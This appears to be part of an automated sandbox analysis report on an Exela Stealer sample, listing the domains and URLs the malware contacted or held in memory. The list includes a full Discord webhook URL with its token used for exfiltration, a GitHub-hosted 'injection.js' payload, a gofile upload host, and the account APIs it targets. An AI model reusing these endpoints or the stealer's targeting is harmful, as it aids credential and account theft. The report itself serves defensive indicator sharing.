https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Sentry.svg	0%	Avira URL Cloud	safe
https://discord.com/api/v8/users/	0%	Virustotal		Browse
https://filepreviews.io/	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T--	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/FilePreviews.svg	1%	Virustotal		Browse
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Sentry.svg	1%	Virustotal		Browse
https://mahler:8092/site-updates.py	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Tidelift.svg	1%	Virustotal		Browse
https://filepreviews.io/	0%	Virustotal		Browse
http://crl4.digice	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/justforExela/injection/main/injection.js	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
store4.gofile.io	31.14.70.245	true	false		high
discord.com	162.159.128.233	true	false	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	false		high
api.gofile.io	51.38.43.18	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T--	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.attrs.org/en/stable/why.html#data-classes).	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://account.riotgames.com/api/account/v1/user	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://accounts.reddit.com/api/access_token	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python-attrs/attrs/issues/251	9afaXJv52z.exe, 00000002.00000003.1549123706.0000020DADF16000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADEF6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1571242400.0000020DADF18000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADEF6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python-attrs/attrs/issues/1085)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://tiktok.com/	9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://media.discordapp.net/attachments/1145679170127532095/1145756091553173696/3-min-5.jpg	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/aio-libs/aiohttp/discussions/6044	9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/sponsors/hynek	METADATA.0.dr	false		high
https://gofile.io/d/VnJMg5)	9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/actions?query=workflow%3ACI	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://oauth.reddit.com/api/v1/me	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/LICENSE-2.0	9afaXJv52z.exe, 00000000.00000003.1247580506.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1247653162.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1247533508.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	9afaXJv52z.exe, 00000002.00000003.1549904859.0000020DAD92B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549821357.0000020DAD924000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1561481044.0000020DAD994000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550963678.0000020DAD991000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python-attrs/attrs)	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/FilePreviews.svg	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.attrs.org/)	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://twitter.com	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/home	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python-attrs/attrs/issues/1090)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://github.com/python-attrs/attrs/issues/136	9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1571019109.0000020DADE86000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1558309573.0000020DADE85000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba	9afaXJv52z.exe, 00000002.00000003.1543162548.0000020DAE862000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://i.hizliresim.com/8po0puy.jfif	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	9afaXJv52z.exe, 00000002.00000002.1568871055.0000020DAD770000.00000004.00001000.00020000.00000000.sdmp	false		high
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://json.org	9afaXJv52z.exe, 00000002.00000003.1549987255.0000020DAD9A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://zopeinterface.readthedocs.io/en/latest/	9afaXJv52z.exe, 00000002.00000003.1557790883.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549460513.0000020DAD9CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1569893970.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551014490.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551721234.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	9afaXJv52z.exe, 00000002.00000002.1565167633.0000020DAD2B8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Tidelift.svg	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python-attrs/attrs/issues/1079)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://raw.githubusercontent.com/justforExela/injection/main/injection.js	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com/api/v8/users/	9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://i.hizliresim.com/qxnzimj.jpg	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/	9afaXJv52z.exe, 00000000.00000003.1247580506.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.attrs.org/en/latest/names.html)	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://www.twitch.tv/	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 0000003D.00000002.2504316046.000001B6AE200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/microsoft/pyright/)).	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Sentry.svg	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://open.spotify.com/user/	9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://filepreviews.io/	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/en/latest/installation/	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0681/)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://g.live.com/odclientsettings/Prod1C:	edb.log.61.dr	false		high
https://t.me/ExelaStealer-------p	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa	METADATA.0.dr	false		high
https://github.com/python-attrs/attrs/issues/1068)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://github.com/python-attrs/attrs/issues/1084)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://www.attrs.org/en/stable/changelog.html	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://cryptography.io/en/latest/security/	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://thumbnails.roblox.com/v1/users/avatar?userIds=	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.variomedia.de/	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://bugs.python.org/issue37179	9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reddit.com/user/	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/issues	METADATA0.0.dr	false		high
https://readthedocs.org/projects/cryptography/badge/?version=latest	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://t.me/ExelaStealer	9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.attrs.org/	METADATA.0.dr	false		high
https://mahler:8092/site-updates.py	9afaXJv52z.exe, 00000002.00000003.1535135735.0000020DADFFE000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557436843.0000020DAE007000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557853052.0000020DAE012000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/python-attrs/attrs/issues/1122)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://github.com/pyca/cryptography	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://www.python.org/download/releases/2.3/mro/.	9afaXJv52z.exe, 00000002.00000002.1565167633.0000020DAD230000.00000004.00001000.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258773956.0000020DAD716000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/	METADATA0.0.dr	false		high
https://docs.python.org/3/library/asyncio-eventloop.html	9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1570923303.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/ExelaStealea	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	false		high
http://python.org/	9afaXJv52z.exe, 00000002.00000003.1549904859.0000020DAD92B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549821357.0000020DAD924000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1569662370.0000020DAD999000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550963678.0000020DAD991000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557993230.0000020DAD997000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python-attrs/attrs/issues/1081)	9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://github.com/pyca/cryptography/	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
